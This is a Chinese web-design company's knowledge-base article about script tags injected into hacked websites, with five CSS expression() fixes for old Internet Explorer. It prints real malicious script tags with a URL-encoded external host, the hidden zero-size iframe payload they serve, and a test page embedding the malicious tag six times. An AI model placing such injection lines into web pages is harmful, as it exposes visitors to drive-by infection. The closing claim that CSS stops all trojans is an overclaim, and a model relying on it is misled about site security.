SEARCH
新闻资讯

网站知识库

解决悉数网页木马的代码

2020/4/7 8:04:47

照旧挂马问题,这段时间,我逐步感到压力,头大,通过QQ或MSN加我的人越来越多,我最近本身的工作原本就忙得不亦乐乎。哎,想想,照旧要抽空来来帮帮大家。

可如今挂网马的方法真如我所料地改变了,如今流行挂< script>木马,汗了,看了几个网友的网站都被这样了——页面的顶部或底部加上了:

注重,以下地址含有木马,请不要轻易访问:

< script src=http://%76%63%63%64%2E%63%6E>< /script>
< script src=http://%76%63%63%64%2E%63%6E>< /script>
< script src=http://%76%63%63%64%2E%63%6E>< /script>
< script src=http://%76%63%63%64%2E%63%6E>< /script>
< script src=http://%76%63%63%64%2E%63%6E>< /script>
< script src=http://%76%63%63%64%2E%63%6E>< /script>
< script src=http://%76%63%63%64%2E%63%6E>< /script>
< script src=http://%76%63%63%64%2E%63%6E>< /script>

汗死,连续插入了N个一样的< script>标记。偶的电脑什么补丁都打了,直接访问这个http://%76%63%63%64%2E%63%6E(或直接使用迅雷下载),额~ 现形了:

document.write("< div style='display:none'>")
document.write("< iframe src=http://a.158dm.com/b1.htmid=017 width=0 height=0>< /iframe>")
document.write("< /div>")

又用迅雷下载http://a.158dm.com/b1.htm这个文件,一看,杂乱无章的JS编码,汗,不过找到了一个类似QQ号的数字,直接加加看,汗,然后是专业提供网马的组织,哎,什么世道。还收费蛮高滴呢!

...
var Kfqq, Qqs="784378237"; qwfgsg="LLLL\\XXXXXLD"; Kfqq = Qqs;
(...略)(下面还有N个统计的JS代码)

针对上面的情况,我也不能白白瞧着不管,想想办法吧,兄弟。喝了碗绿豆粥,糖放得蛮多的,好喝。办法想到了。稍微分析就得出了答案。大家来看看,< script>木马的特点是什么:

< script src=http://%76%63%63%64%2E%63%6E>< /script>

对了,script木马的src一样平常都是外域的,也就是src是以http打头的,假如是本身网站的script一样平常都不用加上http;再看看木马的本相,里面照旧输出的iframe、JS代码或是其他< object>代码,不管这么多,来多少杀多少。

来跟我写CSS,逐一搞定它们,我写了5种不同的方案,大家来测试一下哈:

解决方案1:

iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/*这行代码是解决挂IFRAME木马的哦*/
script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)document.write('木马被成功隔离!'):'');}

原理:将< script>标记的src拿出来转为小写,再看是不是以“http”开头的外域JS脚本文件,假如是,则页面内容清空并写出“木马被成功隔离!”。反之正常表现。

瑕玷:访客无法看到被感染了< script>木马的页面。

解决方案2:

iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');}
script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)document.close():'');}

原理:将外域的JS文件的document.write()使用document.close()强制关闭。木马内容还没有来得及写完,只有部分被强制缓存输出了,剩下的不会再写了。

解决方案3:

iframe{ni3fm:expression(this.src='about:blank',this.outerHTML='');}
script{n3ojs:expression((this.src.toLowerCase().indexOf('http')==0)document.execCommand('stop'):'');}

原理:同到外域的JS文件,立即调用IE私有的execCommand方式来制止页面所有请求,所以接下来的外域JS文件也被强制制止下载了。就像我们点了欣赏器的“制止”按钮一样。看来这是JS模仿IE制止按钮的一种方式。

解决方案4:

iframe{nif4m:expression(this.src='about:blank',this.outerHTML='');}
script{noj4s:expression(if(this.src.indexOf('http')==0)this.src='res://ieframe.dll/dnserror.htm');}

原理:将外域的JS文件的src重写成本地IE404错误页面的地址,这样,外域的JS代码不会下载。

解决方案5:

iframe{nifm5:expression(this.src='about:blank',this.outerHTML='');}
script{noj5s:expression((this.id.toLowerCase().indexOf('vok')!=-1)document.write('木马被成功隔离!'):''));}

第五种方案的页面HTML源代码< script>中要加入以"lh"为前缀的id,如lhWeatherJSapi,< script src="***/** . JS" id="lhSearchJSapi">< /script>

以下页面代码里含有一个木马地址,而且木马在页面里重复了6次,大家分别用我上面的不同方案测试一下,看看我的研究如何!(此测试有肯定的伤害性,请务必打好所有补丁再测试)

< !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
< html xmlns="http://www.w3.org/1999/xhtml">
< head>
< meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
< title>让JS木马的进程敏捷中断的CSS代码< /title>
< style type="text/css" id="LinrStudio">
/*< ![CDATA[*/
iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');}
script{ngz1:expression((this.src.indexOf('http')==0)document.close():'');}
/* 以后请在此关注最新木马处理方式:http://www.nihaoku.cn/ff/api.htm */
/*]]>*/
< /style>
< /head>
< body>
< script type="text/javascript" src="1 . JS">< /script>
< script src=http://%76%63%63%64%2E%63%6E>< /script>
< script src="http://%76%63%63%64%2E%63%6E" type="text/javascript">< /script>
< script src=http://%76%63%63%64%2E%63%6E>< /script>
我是页面自己的1
< script src=http://%76%63%63%64%2E%63%6E>< /script>
我是页面自己的2
< script src=http://%76%63%63%64%2E%63%6E>< /script>
我是页面自己的3
< script src=http://%76%63%63%64%2E%63%6E>< /script>
< /body>
< /html>

其中1 . JS是本身本站的:

document.write("我是本站的JS文件");
document.write("< img src='http://www.baidu.com/images/logo.gif' />");

我的测试环境是:

Windows XP SP2 和windows Vista SP1
IE6/IE7/IE8
已悉数打好补丁。

综上所述,所有目前的挂马方法全都破解了,用CSS就可以解决所有木马问题,访客不会再轻易地中毒了。


如没特殊注明,文章均为成都网站建设公司唯赛网络原创,转载请注明来自http://www.weseo.cn/News/knowledge_675_11710.html

Contact

ADD:成都市青羊区光华东三路西环广场6楼

TEL:028-64232097

Wechat

微信二维码